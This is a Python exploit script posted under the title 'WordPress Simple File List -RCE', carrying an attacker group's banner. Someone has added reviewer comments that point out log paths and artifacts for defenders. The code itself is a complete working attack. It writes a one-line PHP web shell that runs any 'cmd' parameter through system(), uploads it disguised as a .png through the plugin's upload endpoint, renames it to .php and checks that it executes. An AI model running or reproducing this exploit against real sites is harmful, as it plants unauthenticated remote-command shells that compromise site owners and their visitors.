masrizal

WordPress Simple File List -RCE

Jun 21st, 2020
  1. import requests
  2. import random
  3. import hashlib
  4. import sys
  5. import os
  6. import urllib3
# Suppress urllib3's warnings. Every request in this script is sent with
# verify=False (TLS certificate verification off), which would otherwise
# produce a warning per request.
urllib3.disable_warnings()

# Request paths used by the functions below, each appended to the site base
# URL given on the command line. For anyone reviewing a site that runs the
# Simple File List plugin, these are the paths to search for in web-server
# access logs.
# Directory the uploaded file is fetched from (upload(), main()).
dir_path = '/wp-content/uploads/simple-file-list/'
# POST target of upload().
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
# POST target of move() (the rename request).
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
  12.  
  13.  
def usage():
    """Print the command-line help banner to stdout."""
    # Kept as individual lines (including the trailing blanks of the
    # original banner) and joined, so the printed text is unchanged.
    banner_lines = (
        "",
        "===============================    ",
        "Usage : python exploit.py <URL>",
        "Author: coiffeur",
        "Recoded : Crusher.",
        "Facebook : fb.com/crusher.gov",
        "Site : www.DestroySquad.Com",
        "===============================",
        "   ",
    )
    print("\n".join(banner_lines))
  25.  
  26.  
def generate():
    """Create the local file that upload() later sends, and return its name.

    A one-line PHP snippet is written to a file in the current working
    directory named ``<random integer 0..10000>.png``. The ``.png`` name is
    only a label; the content is PHP source, not image data.

    Returns:
        tuple: ``(filename, password)``, where ``password`` is the MD5 hex
        digest of 20 random bytes.

    NOTE(review): ``password`` is printed and returned but never written into
    the file. The snippet passes the ``cmd`` query parameter straight to
    ``system()`` with no access check, so a file dropped this way is usable
    by anyone who learns its URL. Incident response should treat such a file
    as open to third parties, not only to whoever placed it.
    """
    # Only 10001 possible names, always "<digits>.png"; the numeric stem is
    # kept when the file is renamed later, which makes it a usable search
    # pattern under the plugin's upload directory.
    filename = f'{random.randint(0, 10000)}.png'
    password = hashlib.md5(bytearray(random.getrandbits(8)
                                     for _ in range(20))).hexdigest()
    with open(f'{filename}', 'wb') as f:
        payload = '<?php echo system($_GET["cmd"]);?>'
        f.write(payload.encode())
    print(f'[+] File {filename} generated with password: {password}')
    return filename, password
  36.  
  37.  
def upload(url, filename):
    """POST the generated file to the plugin's upload endpoint and check it is reachable.

    Args:
        url: Site base URL; the module-level paths are appended to it.
        filename: Name of the local file produced by generate().

    Returns:
        ``filename`` unchanged, when a follow-up GET of the uploaded file
        answers HTTP 200. On any other status the process exits with -1.
    """
    # The multipart part is declared as image/png although the content is the
    # PHP snippet written by generate().
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    # Form fields sent with the file. The timestamp and token are fixed
    # literals, so every run of this script sends the same pair; that makes
    # them matchable values for request-body inspection (WAF / log review).
    # NOTE(review): how the endpoint validates them is not visible here.
    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
             'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
    # The POST response is not inspected; `r` is overwritten by the GET below.
    r = requests.post(url=f'{url}{upload_path}',
                      data=datas, files=files, verify=False)
    # Success is judged only by whether the file can be fetched back from the
    # upload directory.
    r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
    if r.status_code == 200:
        # Message is Indonesian, roughly "uploaded here".
        print(f'[ ] KeUpload Nih {url}{dir_path}{filename}')
        # Delete the local copy once the remote one is confirmed.
        os.remove(filename)
    else:
        # Message is Indonesian, roughly "upload failed".
        print(f'[*] Gagal Upload Bos{filename}')
        exit(-1)
    return filename
  52.  
  53.  
def move(url, filename):
    """Ask the plugin's file engine to rename the uploaded file to a ``.php`` name.

    Args:
        url: Site base URL; the module-level paths are appended to it.
        filename: Name of the file previously uploaded by upload().

    Returns:
        The new ``<stem>.php`` name when the rename request answers HTTP 200.
        On any other status the process exits with -1.

    The rename is what turns the uploaded ``.png`` into a file with a ``.php``
    extension inside the upload directory. A rename request whose target ends
    in ``.php``, or a numerically named ``.php`` file under that directory, is
    the artifact to look for when checking whether a site was hit.
    """
    # Everything before the first dot, plus ".php" (e.g. "123.png" -> "123.php").
    new_filename = f'{filename.split(".")[0]}.php'
    # Referer naming the plugin's admin page plus the XMLHttpRequest marker.
    # NOTE(review): presumably meant to resemble a request issued from the
    # admin UI; what the endpoint actually checks is not visible here.
    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
               'X-Requested-With': 'XMLHttpRequest'}
    # 'eeFileAction' carries the operation and the new name in one field,
    # separated by '|'.
    datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
             'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
    r = requests.post(url=f'{url}{move_path}',
                      data=datas, headers=headers, verify=False)
    # Only the status code is checked; the response body is not inspected and
    # the renamed file is not fetched here.
    if r.status_code == 200:
        # Message is Indonesian, roughly "here is the shell".
        print(f'[ ] Nih Shell nya {url}{dir_path}{new_filename}')
    else:
        print(f'[*] Failed to move {filename}')
        exit(-1)
    return new_filename
  68.  
  69.  
def main(url):
    """Run generate() -> upload() -> move() against ``url`` and print the outcome.

    Args:
        url: Site base URL taken from the command line.
    """
    file_to_upload, password = generate()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    # move() either returns a non-empty name or exits, so this branch is
    # always taken when execution gets this far.
    if moved_file:
        print(f'[+] Mantep..\n[*] Got Hacked...')

    # Final check: POST 'password' and 'cmd' to the renamed file and treat
    # HTTP 200 plus the substring 'php' anywhere in the body as success.
    # NOTE(review): the printed password is the value from generate(); nothing
    # in this file shows the dropped file checking it.
    datas = {'password': password, 'cmd': 'phpinfo();'}
    r = requests.post(url=f'{url}{dir_path}{moved_file}',
                      data=datas, verify=False)
    if r.status_code == 200 and r.text.find('php') != -1:
        print('[+] Exploit work !')
        print(f'\tURL: {url}{dir_path}{moved_file}')
        print(f'\tPassword: {password}')
  84.  
  85.  
if __name__ == "__main__":
    # The site base URL is the only command-line argument; without it, show
    # the banner and stop with a non-zero status.
    cli_args = sys.argv[1:]
    if not cli_args:
        usage()
        exit(-1)

    main(cli_args[0])